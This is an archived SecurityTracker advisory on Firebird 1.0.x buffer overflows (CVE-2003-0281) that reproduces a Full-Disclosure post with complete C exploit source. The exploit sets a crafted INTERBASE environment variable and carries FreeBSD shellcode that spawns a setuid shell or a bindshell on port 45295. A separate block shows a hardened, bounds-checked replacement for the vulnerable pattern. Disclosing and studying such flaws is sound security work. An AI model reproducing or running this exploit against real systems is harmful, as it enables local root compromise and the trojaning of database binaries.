SecurityTracker
Archives

Category:   Application (Database)  >   Firebird Vendors:   firebird.sourceforge.net
Firebird Database Buffer Overflows Let Local Users Gain Elevated or Root Privileges
SecurityTracker Alert ID:  1006738
SecurityTracker URL:  http://securitytracker.com/id/1006738
CVE Reference:   CVE-2003-0281
Updated:  Feb 29 2004
Original Entry Date:  May 10 2003
Impact:   Execution of arbitrary code via local system, Modification of user information, Root access via local system, User access via local system
Exploit Included:  Yes  
Version(s): 1.0.0, 1.0.2
Description:   Several buffer overflow vulnerabilities were reported in the Firebird database. A local user can obtain elevated privileges, potentially including root privileges.

Dtors Security Research reported that the gds_inet_server, gds_drop, and gds_lock_mgr applications do not perform proper bounds checking on variables returned by the getenv() function. A local user can set the INTERBASE environment variable to a specially crafted value to trigger the overflow and execute arbitrary code.

On FreeBSD, the software is installed by default with set user id (setuid) 'firebird' user privileges, so the code will run with the privileges of the database user account, according to the report. On Linux, the software is reportedly installed with setuid 'root' user privileges, allowing the code to run with root privileges.

On FreeBSD, once the local user has 'firebird' user privileges, the local user can modify the database binaries to include trojan code. Then, when a target user on the system executes the database, the local user can gain the privileges of that target user (including those of root users).

Some demonstration exploit code is provided in the Source Message.

Impact:   A local user can execute arbitrary code with 'firebird' user privileges or 'root' user privileges, depending on the installation.

With 'firebird' user privileges, the local user can modify the database application to obtain elevated privileges when a target user runs the database.
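The bounds-checking failure the report describes, shown here as an added example that is not Firebird's code: a fixed-size path buffer is filled from the INTERBASE variable with strcpy(), beside a replacement that rejects oversized values and ignores the environment entirely when the process runs with elevated (setuid/setgid) privileges. The buffer size, default root path, file name and function names are assumptions for illustration; the real Firebird buffer and call sites are not on this page.

```c
/* Added example (not Firebird's source): the getenv()-to-fixed-buffer
 * pattern the advisory describes, next to a bounds-checked replacement.
 * All names, sizes and paths here are illustrative assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PATH_BUF 256   /* assumed fixed buffer size; the real one is not on the page */

/* VULNERABLE (shown for contrast only; never call it with untrusted input):
 * strcpy()/strcat() copy however many bytes INTERBASE holds into a
 * PATH_BUF-byte stack buffer, so a long value overruns it. */
void unsafe_build_path(char *out, const char *file)
{
    const char *root = getenv("INTERBASE");
    if (root == NULL)
        root = "/usr/local/firebird";
    strcpy(out, root);          /* no length check at all */
    strcat(out, "/");
    strcat(out, file);
}

/* HARDENED, step 1: a setuid/setgid program must not trust its environment,
 * so report the variable as absent when real and effective ids differ
 * (the same idea as glibc's secure_getenv()). */
const char *trusted_getenv(const char *name)
{
    if (getuid() != geteuid() || getgid() != getegid())
        return NULL;
    return getenv(name);
}

/* HARDENED, step 2: build "<root>/<file>" into out. Returns 0 on success,
 * -1 if the result would not fit in outlen bytes (NUL included); on failure
 * out holds an empty string. Oversized input is rejected, not truncated. */
int safe_build_path(const char *root, const char *file, char *out, size_t outlen)
{
    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    size_t need = strlen(root) + 1 + strlen(file) + 1;
    if (need > outlen)
        return -1;
    int n = snprintf(out, outlen, "%s/%s", root, file);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Environment-driven variant: falls back to the built-in default when the
 * variable is unset, empty or untrusted; still fails closed when too long. */
int build_path_from_env(const char *var, const char *default_root,
                        const char *file, char *out, size_t outlen)
{
    const char *root = trusted_getenv(var);
    if (root == NULL || root[0] == '\0')
        root = default_root;
    return safe_build_path(root, file, out, outlen);
}

/* Constructed scenarios; returns how many behaved as intended (3 expected). */
int check_scenarios(void)
{
    char out[PATH_BUF];
    char huge[1056];            /* same length the reported exploit used */
    int passed = 0;

    memset(huge, 'A', sizeof huge - 1);
    huge[sizeof huge - 1] = '\0';

    /* 1: an ordinary value is accepted */
    setenv("INTERBASE", "/opt/firebird", 1);
    if (build_path_from_env("INTERBASE", "/usr/local/firebird", "isc4.gdb",
                            out, sizeof out) == 0
        && strcmp(out, "/opt/firebird/isc4.gdb") == 0)
        passed++;

    /* 2: an oversized value is rejected instead of overflowing */
    setenv("INTERBASE", huge, 1);
    if (build_path_from_env("INTERBASE", "/usr/local/firebird", "isc4.gdb",
                            out, sizeof out) == -1
        && out[0] == '\0')
        passed++;

    /* 3: an unset variable falls back to the default root */
    unsetenv("INTERBASE");
    if (build_path_from_env("INTERBASE", "/usr/local/firebird", "isc4.gdb",
                            out, sizeof out) == 0
        && strcmp(out, "/usr/local/firebird/isc4.gdb") == 0)
        passed++;

    return passed;
}

int main(void)
{
    printf("%d of 3 scenarios handled safely\n", check_scenarios());
    return 0;
}
```

The two halves of the hardening are independent: the length check alone stops the overflow, and refusing the environment under a privilege change stops a local user from steering a setuid binary through any variable at all, which also covers the FIREBIRD_LOCK variable the advisory mentions in passing.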

Solution:   No solution was available at the time of this entry.
Vendor URL:  firebird.sourceforge.net/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 23 2004 (Gentoo Issues Fix) Firebird Database Buffer Overflows Let Local Users Gain Elevated or Root Privileges
Gentoo has released a fix.



Source Message Contents

Subject:  [Full-Disclosure] Firebird local root compromise


-[[Dtors Security Research]]-
-[[     www.dtors.net     ]]-

-[Package: Firebird_1.0.2 [FreeBSD]
-[Versions Affected: 1.0.2 <
-[Website: http://firebird.sf.net
-[Exploit: Local Stack Overflow
-[Date: 22/03/2003
-[Author: bob@dtors.net && kokanin@dtors.net

--[BACKGROUND

Firebird is a relational database offering many ANSI SQL-92 features
that runs on Linux, Windows, and a variety of Unix platforms. Firebird
offers excellent concurrency, high performance, and powerful language
support for stored procedures and triggers. It has been used in
production systems, under a variety of names since 1981.

For more information on Firebird and InterBase, see:

http://sourceforge.net/projects/firebird/
http://www.ibphoenix.com/
http://www.interbase2000.org/
http://www.interbase.com/
http://www.firebirdsql.org/


--[DESCRIPTION

Firebird has 3 binaries [gds_inet_server, gds_drop, and gds_lock_mgr],
which all use insufficient bounds checking in conjunction with getenv(),
making each one susceptible to local exploitation.

Firebird is by default setuid[firebird]. This exploit can lead to
root/escalated privileges, should the attacker trojan the local firebird
application.



--[ANALYSIS

Upon setting a large value for the INTERBASE environment variable a buffer
can be overflowed. Links to the exploit should accompany this advisory.

--[Please note that there is an exploit written for both versions of
firebird.

Exploiting this hole will allow the attacker to, amongst other things,
manipulate and/or destroy the databases, and also add the option to trojan
the firebird binaries. This will in effect allow for compromising of other
users/root accounts.

--[SYSTEMS AFFECTED:

firebird 1.0.0 [BSD/Linux] are vulnerable.
firebird-1.0.2 [BSD/Linux] are vulnerable.


--[EXPLOIT CODE

/* DSR-firebird.c by bob@dtors.net
   -------------------------------

Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE

bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( (                           by - bob@dtors.net ) )
----------------------------------------------------

Usage: ./DSR-firebird <target#>
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop

www.dtors.net
bash-2.05a$

Thanks go to eSDee && ilja for helping me
with the gds_lock_mgr problems.

bob@dtors.net
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>     /* execl() */

#define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP    "/usr/local/firebird/bin/gds_drop"
#define INET    "/usr/local/firebird/bin/gds_inet_server"
#define LEN     1056

char dropcode[] =
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
        "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
        "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

char inetcode[] =
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
        "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
        "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

char lockcode[] =
        "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
        "\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"  /* setuid[firebird] by bob */
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53"          /* fork() bindshell by eSDee */
        "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
        "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
        "\x50\x50\x66\x68\xb0\xef\xb7\x02"
        "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
        "\x53\x51\x57\x50\xb0\x68\xcd\x80"
        "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
        "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
        "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
        "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
        "\xe2\x50\x51\x52\xb3\x14\x53\x50"
        "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
        "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
        "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
        "\x39\xc3\x75\x44\x31\xc0\x57\x50"
        "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
        "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
        "\x80\x31\xc0\x43\x53\x56\x50\xb0"
        "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
        "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
        "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
        "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
        "\xeb\x9a";

/* Map the target number given on the command line to its payload. */
char *decide(char *string)
{
    if(!(strcmp(string, "1")))
        return((char *)&inetcode);
    if(!(strcmp(string, "2")))
        return((char *)&lockcode);
    if(!(strcmp(string, "3")))
        return((char *)&dropcode);
    exit(0);
}

int main(int argc, char **argv)
{
    unsigned long ret = 0xbfbff743;

    char *selectcode;
    char buffer[LEN + 1];   /* one extra byte for the terminating NUL: the original
                               declared buffer[LEN] and then wrote buffer[1056] */
    char egg[1024];
    char *ptr;
    size_t i = 0;

    if(argc < 2)
    {
        printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");
        printf("( (                           by - bob@dtors.net ) )\n");
        printf("----------------------------------------------------\n\n");
        printf("Usage: %s <target#> \n", argv[0]);
        printf("Targets:\n");
        printf("1. [0xbfbff743] - gds_inet_server\n");
        printf("2. [0xbfbff743] - gds_lock_mgr\n");
        printf("3. [0xbfbff743] - gds_drop\n");
        printf("\nwww.dtors.net\n");
        exit(0);
    }

    selectcode = (char *)decide(argv[1]);
    memset(buffer, 0x41, sizeof(buffer));

    /* EGG: NOP sled followed by the selected payload, exported as an environment variable */
    ptr = egg;

    for (i = 0; i < 1024 - strlen(selectcode) - 1; i++) *(ptr++) = 0x90;
    for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
    egg[1024 - 1] = '\0';

    memcpy(egg, "EGG=", 4);
    putenv(egg);

    /* INTERBASE: filler with the return address at offset 1052, NUL-terminated at LEN */
    memcpy(&buffer[1052], (char *)&ret, 4);
    buffer[LEN] = 0;

    setenv("INTERBASE", buffer, 1);

    fprintf(stdout, "Return Address: 0x%lx\n", ret);
    fprintf(stdout, "Buffer Size: %d\n", LEN);
    fprintf(stdout, "Setuid [90]\n");

    if(selectcode == (char *)&inetcode)
    {
        execl(INET, INET, NULL);
        return 0;
    }

    if(selectcode == (char *)&lockcode)
    {
        printf("\nShell is on port 45295\nExploit will hang!\n");
        execl(LOCK, LOCK, NULL);
        return 0;
    }

    if(selectcode == (char *)&dropcode)
    {
        execl(DROP, DROP, NULL);
        return 0;
    }

    return 0;
}

--[Misc

As stated earlier, Linux is also vulnerable. The problem here
is that Linux by default sets firebird setuid root. There
exist a few more problems with Linux. For example some command
line overflows with certain switches will allow the attacker
to change the flow of execution, or it can be changed using
the environment variable [FIREBIRD_LOCK].

This whole package should be revised before the next release.

Firebird 1.0.0 exploit @ http://bob.dtors.net/DSR-olbird.c
Firebird 1.0.2 exploit @ http://bob.dtors.net/DSR-firebird.c


--[CREDIT

kokanin@dtors.net
bob@dtors.net


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html